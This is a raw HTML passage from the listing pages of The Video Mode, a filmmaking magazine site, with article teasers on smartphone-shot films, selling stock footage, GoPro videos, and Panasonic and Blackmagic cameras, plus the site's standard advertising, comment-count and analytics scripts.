href="http://www.thevideomode.com/news/smartphone-filmmaking-mobile-5602/" rel="bookmark">New feature length drama to be shot entirely on smartphones</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>New smartphone filmmaking project Body &amp; Soul will be shot entirely on mobile phones, Credit:&hellip;</p> </div> </article> <article class="loop post-5595 post type-post status-publish format-standard has-post-thumbnail hentry category-tuition tag-film-making-basics publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/tuition/five-things-selling-stock-footage-5595/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/sea-1615001_960_720-630x420.jpg" class="lazyload blur-up wp-post-image" alt="selling stock footage" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/sea-1615001_960_720-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/sea-1615001_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/sea-1615001_960_720-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/sea-1615001_960_720.jpg 960w" data-image-id="5597" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/tuition/five-things-selling-stock-footage-5595/" rel="bookmark">Four things you need to know about selling stock footage</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Selling your video can seem like a confusing task so we&#8217;ve rounded up a list&hellip;</p> </div> </article> <article class="loop post-5591 post type-post status-publish format-standard has-post-thumbnail hentry category-showcase tag-gopro review_manufacturer-gopro publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/showcase/seven-best-gopro-videos-ever-5591/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gopro-2602190_960_720-630x420.jpg" class="lazyload blur-up wp-post-image" alt="gopro videos" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gopro-2602190_960_720-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gopro-2602190_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gopro-2602190_960_720-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gopro-2602190_960_720.jpg 960w" data-image-id="5592" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/showcase/seven-best-gopro-videos-ever-5591/" rel="bookmark">Seven of the best GoPro videos ever</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>We&#8217;ve rounded up some of the best GoPro videos of all time to give you&hellip;</p> </div> </article> <article class="loop post-5586 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-panasonic review_manufacturer-panasonic publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/panasonic-launches-lumix-g9-5586/" rel="bookmark"><img width="630" height="421" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/G9_LKIT_slant_K-e1510155697245-630x421.jpg" class="lazyload blur-up wp-post-image" alt="" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/G9_LKIT_slant_K-e1510155697245-630x421.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/G9_LKIT_slant_K-e1510155697245-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/G9_LKIT_slant_K-e1510155697245-300x200.jpg 300w" data-image-id="5589" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/panasonic-launches-lumix-g9-5586/" rel="bookmark">Panasonic launches new 4K LUMIX G9 camera</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Panasonic has announced the new LUMIX G9, Credit: Panasonic Panasonic has announced its new flagship mirrorless&hellip;</p> </div> </article> <article class="loop post-5574 post type-post status-publish format-standard has-post-thumbnail hentry category-news publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/blackmagic-ursa-mini-short-film-5574/" rel="bookmark"><img width="630" height="419" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Screen-Shot-2017-11-07-at-14.46.19-e1510066707285-630x419.png" class="lazyload blur-up wp-post-image" alt="Blackmagic URSA Mini 4.6K" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Screen-Shot-2017-11-07-at-14.46.19-e1510066707285-630x419.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Screen-Shot-2017-11-07-at-14.46.19-e1510066707285-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Screen-Shot-2017-11-07-at-14.46.19-e1510066707285-300x200.png 300w" data-image-id="5577" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/blackmagic-ursa-mini-short-film-5574/" rel="bookmark">Blackmagic URSA Mini 4.6K used to shoot new short film</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Some production stills from the filming of &#8216;Strays&#8217; with the Blackmagic URSA Mini 4.6K camera&hellip;</p> </div> </article> <article class="loop post-5565 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-gopro publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/gopro-affordable-action-camera-5565/" rel="bookmark"><img width="630" height="419" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/camera-2593685_1280-630x419.jpg" class="lazyload blur-up wp-post-image" alt="gopro" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/camera-2593685_1280-630x419.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/camera-2593685_1280-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/camera-2593685_1280-300x199.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/camera-2593685_1280.jpg 1280w" data-image-id="5567" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/gopro-affordable-action-camera-5565/" rel="bookmark">Is GoPro working on a new affordable action camera?</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>GoPro have announced their third quarterly results and hinted at the potential launch of a&hellip;</p> </div> </article> </div></section><!-- .widget --> </section> </div> <div class="row"> <section class="col-xs-12 col-sm-6 sidebar"> </section> <section class="col-xs-12 col-sm-6 sidebar"> </section> </div> <div class="row"> </div> </div><!-- .primary --> <aside class="secondary col-xs-12 col-md-4 col-lg-6"> <div class="row"> <div class="col-xs-12 col-sm-6 col-md-12 col-lg-6 sidebar sidebar-secondary"> <section id="keystone-query-widget-id-3" class="palette-b listing--single s-container no-hr widget widget-area-1-col keystone-query-widget"><h1 class="widgettitle heading">Latest</h1><div class="section section-style-list-large"> <article class="loop post-5558 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-film-festivals tag-virtual-reality publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/virtual-reality-filmmaking-5558/" rel="bookmark"><img width="300" height="200" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/virtual-reality-2874659_960_720-e1509720247412-300x200.jpg" class="lazyload blur-up wp-post-image" alt="" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/virtual-reality-2874659_960_720-e1509720247412-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/virtual-reality-2874659_960_720-e1509720247412-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/virtual-reality-2874659_960_720-e1509720247412-630x421.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/virtual-reality-2874659_960_720-e1509720247412.jpg 719w" data-image-id="5560" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/virtual-reality-filmmaking-5558/" rel="bookmark">Virtual reality filmmaking recognised with first Oscar®</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> </div> </article> <article class="loop post-57 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-showcase tag-time-lapse tag-top-story publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/timelapse-inspiration-videos-57/" rel="bookmark"><img width="300" height="200" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/03/architecture-2558191_960_720-300x200.jpg" class="lazyload blur-up wp-post-image" alt="timelapse inspiration" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/03/architecture-2558191_960_720-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/03/architecture-2558191_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/03/architecture-2558191_960_720-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/03/architecture-2558191_960_720.jpg 960w" data-image-id="5556" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/timelapse-inspiration-videos-57/" rel="bookmark">Nine incredible videos for some timelapse inspiration</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> </div> </article> <article class="loop post-942 post type-post status-publish format-video has-post-thumbnail hentry category-showcase tag-behind-the-scenes tag-timelapse post_format-post-format-video publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/showcase/watch-an-amazing-10k-timelapse-of-rio-de-janeiro-942/" rel="bookmark"><img width="300" height="200" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/08/rio-de-janeiro-2790455_1280-300x200.jpg" class="lazyload blur-up wp-post-image" alt="timelapse video" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/08/rio-de-janeiro-2790455_1280-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/08/rio-de-janeiro-2790455_1280-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/08/rio-de-janeiro-2790455_1280-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/08/rio-de-janeiro-2790455_1280.jpg 1280w" data-image-id="5552" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/showcase/watch-an-amazing-10k-timelapse-of-rio-de-janeiro-942/" rel="bookmark">Watch: Amazing 10K timelapse video of Rio De Janeiro</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> </div> </article> </div></section><!-- .widget --><section id="ipc-advert-id-6" class=" widget widget-area-1-col ipc-advert-class"><div id="dfpad-mpu-1" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('dfpad-mpu-1'); }</script></div></section><!-- .widget --><section id="ipc-advert-id-9" class=" no-hr widget widget-area-1-col ipc-advert-class"><div id="dfpad-mpu-2" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('dfpad-mpu-2'); }</script></div></section><!-- .widget --> </div> <div class="col-xs-12 col-sm-6 col-md-12 col-lg-6 sidebar sidebar-tertiary"> <section id="ipc-advert-id-5" class="visible-sm hidden-xs no-hr widget widget-area-1-col ipc-advert-class"><div id="dfpad-mpu-2" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('dfpad-mpu-2'); }</script></div></section><!-- .widget --><section id="keystone-query-widget-id-13" class="palette-a listing--single s-container widget widget-area-1-col keystone-query-widget"><h1 class="widgettitle heading">Video tutorials</h1><div class="section section-style-list-large"> <article class="loop post-5496 post type-post status-publish format-standard has-post-thumbnail hentry category-diy category-news category-tuition tag-film-making-basics tag-top-story tag-vlogging tag-wedding publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/make-money-as-a-filmmaker-5496/" rel="bookmark"><img width="300" height="200" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/british-1209730_960_720-e1508938168176-300x200.jpg" class="lazyload blur-up wp-post-image" alt="make money as a filmmaker" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/british-1209730_960_720-e1508938168176-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/british-1209730_960_720-e1508938168176-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/british-1209730_960_720-e1508938168176-630x419.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/10/british-1209730_960_720-e1508938168176.jpg 811w" data-image-id="5505" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/make-money-as-a-filmmaker-5496/" rel="bookmark">How to make money as a filmmaker right now</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>You&#8217;ve had your training and you&#8217;ve got your camera but how do you actually make money as a filmmaker? Starting out as a videographer means that you will need to build&hellip;</p> </div> </article> <article class="loop post-244 post type-post status-publish format-video has-post-thumbnail hentry category-tuition post_format-post-format-video publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/tuition/top-tips-for-shooting-video-dslr-244/" rel="bookmark"><img width="300" height="200" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/05/camera-1067853_1280-1-300x200.jpg" class="lazyload blur-up wp-post-image" alt="tips for shooting video" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/05/camera-1067853_1280-1-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/05/camera-1067853_1280-1-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/05/camera-1067853_1280-1-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/05/camera-1067853_1280-1.jpg 1280w" data-image-id="5490" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/tuition/top-tips-for-shooting-video-dslr-244/" rel="bookmark">Three top tips for shooting video with a DSLR</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Wildlife and nature photographer and videographer, Luke Massey, gives us his top tips for shooting video footage on your DSLR. In his career, Luke has gone from just shooting stills&hellip;</p> </div> </article> <article class="loop post-1985 post type-post status-publish format-video has-post-thumbnail hentry category-news category-tuition tag-editing tag-premiere post_format-post-format-video review_manufacturer-adobe publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/adobe-premiere-shortcuts-1985/" rel="bookmark"><img width="300" height="199" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/01/laptop-2589420_960_720-300x199.jpg" class="lazyload blur-up wp-post-image" alt="adobe premiere shortcuts" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/01/laptop-2589420_960_720-300x199.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/01/laptop-2589420_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/01/laptop-2589420_960_720-630x419.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/01/laptop-2589420_960_720.jpg 960w" data-image-id="5390" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/adobe-premiere-shortcuts-1985/" rel="bookmark">Adobe Premiere shortcuts that will speed up your video editing</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>One of the greatest time sinks in video editing, just as in really any software based task, is having to fiddle with the interface &#8211; Adobe Premiere shortcuts can help.&hellip;</p> </div> </article> </div></section><!-- .widget --> </div> </div> </aside><!-- secondary --> </div><!-- .row --> </div><!-- #content --> <footer id="footer" role="contentinfo" class="row palette-b"> <aside class="col-xs-12 col-sm-6 col-md-4 col-lg-3 sidebar sidebar-footer" role="complementary"> <section id="nav_menu-2" class=" widget widget-area-1-col widget_nav_menu"><h1 class="widgettitle heading">Explore this site</h1><div class="menu-footer-container"><ul id="menu-footer" class="menu"><li id="menu-item-5447" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon first-menu-item menu-item-5447"><a href="http://www.thevideomode.com/news/"><span>Video News</span></a></li> <li id="menu-item-5448" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon menu-item-5448"><a href="http://www.thevideomode.com/interviews/"><span>Interviews</span></a></li> <li id="menu-item-5449" class="menu-item menu-item-type-taxonomy menu-item-object-category no-icon last-menu-item menu-item-5449"><a href="http://www.thevideomode.com/tuition/"><span>Film Tuition</span></a></li> </ul></div></section><!-- .widget --><section id="search-4" class="hidden-md hidden-lg widget widget-area-1-col widget_search"><form role="search" method="get" class="search-form form-inline" action="http://www.thevideomode.com/"> <div class="input-group"> <input type="search" value="" name="s" class="input-sm search-field form-control" placeholder="Search The Video Mode"> <label class="sr-only">Search for:</label> <span class="input-group-btn"> <button type="submit" class="search-submit btn btn-primary btn-sm">Search</button> </span> </div> </form></section><!-- .widget --><section id="embed_code-3" class="hidden-md hidden-lg widget widget-area-1-col widget_embed_code"><h1 class="widgettitle heading">Social</h1><a href="https://www.facebook.com/thevideomode/"><span style="font-family: keystone; font-size: 48px; color: #4c66a4; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">f</span></a><a href="https://twitter.com/thevideomode"><span style="font-family: keystone; font-size: 48px; color: #4099FF; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">t</span></a><a href="/feed"><span style="font-family: keystone; font-size: 48px; color: #FF6600; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">r</span></a><a </section><!-- .widget --> </aside> <aside class="hidden-xs col-sm-6 col-md-4 col-lg-3 sidebar sidebar-footer" role="complementary"> <section id="embed_code-2" class="visible-md hidden-xs hidden-sm widget widget-area-1-col widget_embed_code"><h1 class="widgettitle heading">Social</h1><a href="https://www.facebook.com/thevideomode/"><span style="font-family: keystone; font-size: 48px; color: #4c66a4; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">f</span></a><a href="https://twitter.com/thevideomode"><span style="font-family: keystone; font-size: 48px; color: #4099FF; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">t</span></a><a href="/feed"><span style="font-family: keystone; font-size: 48px; color: #FF6600; margin-right: 8px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;">r</span></a><a </section><!-- .widget --> </aside> <aside class="hidden-xs hidden-sm col-md-4 col-lg-3 sidebar sidebar-footer" role="complementary"> <section id="search-3" class=" widget widget-area-1-col widget_search"><h1 class="widgettitle heading">Search</h1><form role="search" method="get" class="search-form form-inline" action="http://www.thevideomode.com/"> <div class="input-group"> <input type="search" value="" name="s" class="input-sm search-field form-control" placeholder="Search The Video Mode"> <label class="sr-only">Search for:</label> <span class="input-group-btn"> <button type="submit" class="search-submit btn btn-primary btn-sm">Search</button> </span> </div> </form></section><!-- .widget --> </aside> <aside class="hidden-xs hidden-sm hidden-md col-lg-3 sidebar sidebar-footer" role="complementary"> </aside> <div class="clearfix"></div> <aside class="col-xs-12 sidebar sidebar-footer-required" role="complementary"> <section id="text-2" class=" widget widget-area-4-col widget_text"> <div class="textwidget"><p><sub>© Copyright TI Media Limited. All rights reserved. <a href="http://www.timeincuk.com/terms-and-conditions/" target="_blank" rel="noopener">Terms &amp; conditions</a> | <a href="http://www.timeincuk.com/privacy/" target="_blank" rel="noopener">Privacy policy</a> | <a class="privacy-setting">Privacy Settings</a></sub></p> </div> </section><!-- .widget --> </aside> </footer><!-- #footer --> </div><!-- #wrapper .hfeed --> <div id="wp-footer"> <script type="text/javascript"> (function() { /* Include required screen size functions right here */ var getDisplayWidth=function(){var e=0;if(typeof window.innerWidth!="undefined"){e=window.innerWidth}else if(typeof document.documentElement!="undefined"&&typeof document.documentElement.clientWidth!="undefined"&&document.documentElement.clientWidth!=0){e=document.documentElement.clientWidth}else{e=document.getElementsByTagName("body")[0].clientWidth}return Number(e)}; var getWindowSize = getDisplayWidth(); window.ipcTags = window.ipcTags || {}; /* Pageskin targeting stuff */ if(getWindowSize >= 1350) { window.ipcTags['pageskin'] = 'yes'; } else { window.ipcTags['pageskin'] = 'no'; } window.ipcTags['dfp_config']['required_tags'].push('pageskin'); })(); </script> <script type="text/javascript"> // <![CDATA[ var disqus_shortname = 'thevideomode'; (function () { var nodes = document.getElementsByTagName('span'); for (var i = 0, url; i < nodes.length; i++) { if (nodes[i].className.indexOf('dsq-postid') != -1 && nodes[i].parentNode.tagName == 'A') { nodes[i].parentNode.setAttribute('data-disqus-identifier', nodes[i].getAttribute('data-dsqidentifier')); url = nodes[i].parentNode.href.split('#', 1); if (url.length == 1) { url = url[0]; } else { url = url[1]; } nodes[i].parentNode.href = url + '#disqus_thread'; } } var s = document.createElement('script'); s.async = true; s.type = 'text/javascript'; s.src = '//' + disqus_shortname + '.disqus.com/count.js'; (document.getElementsByTagName('HEAD')[0] || document.getElementsByTagName('BODY')[0]).appendChild(s); }()); // ]]> </script> <script type='text/javascript'> (function(d,w){ var s = d.createElement('script'); w.lazySizesConfig = {'expFactor':'1'}; s.src = 'http://www.thevideomode.com/wp-content/plugins/keystone-images/assets/js/sizes.js?ver=0.0.1'; d.body.appendChild(s); })(document,window); </script><script type='text/javascript'> /* <![CDATA[ */ var keystoneJWPlayerConfig = {"viewplay":"0","viewplay_sticky_tabswitch":"","sticky":"0","sticky_position":"right","mute":"0"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.thevideomode.com/wp-content/plugins/keystone-jwplayer/assets/js/main.js?ver=1.0.16'></script> <script type='text/javascript' src='http://www.thevideomode.com/wp-content/plugins/ipc-wordpress-digital-editions/public/assets/js/public.js?ver=2.2.2'></script> <script type='text/javascript' src='http://www.thevideomode.com/wp-content/themes/keystone-theme/assets/js/scripts.min.js?ver=1557930479'></script> <script type='text/javascript' src='http://www.thevideomode.com/wp-content/plugins/keystone-newsletter/widget/js/widget.js?ver=1.1.4'></script> <script type='text/javascript' src='http://www.thevideomode.com/wp-includes/js/wp-embed.min.js?ver=NS4x'></script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.thevideomode.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=NS4x"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <script type="text/javascript" charset="utf-8"> (function loadAdloaderAugmentation() { var protocol = ("https:" == document.location.protocol) ? "https://" : "http://"; url = ("https:" == document.location.protocol) ? "secure.zardoz.ipcdigital.co.uk/752d812/videomode/thirdparty/12066/adloader.js?v=hawkeyev1" : "zardoz.ipcdigital.co.uk/752d812/videomode/thirdparty/12066/adloader.js?v=hawkeyev1", f = unescape("%3Cscript src='" + protocol + url + "' type='text/javascript'%3E%3C/script%3E"); document.write(f); })(); </script> <div id="dfpad-overlay" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('dfpad-overlay'); }</script></div><div id="gumgum" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('gumgum'); }</script></div><div id="instream" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('instream'); }</script></div><div id="sovrn" class="ipc-advert"><script type="text/javascript">if(typeof ipc.adloader !== "undefined"){ ipc.adloader.registerSlot('sovrn'); }</script></div> </div><!-- #wp-footer --> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"aaccaa7fff","applicationID":"14178091,9562757,14552354","transactionName":"YgNVYEcAXhJYBUQNXFtJYkZcTlkPXQNISkNdFg==","queueTime":0,"applicationTime":42,"atts":"TkRWFg8aTRw=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
0
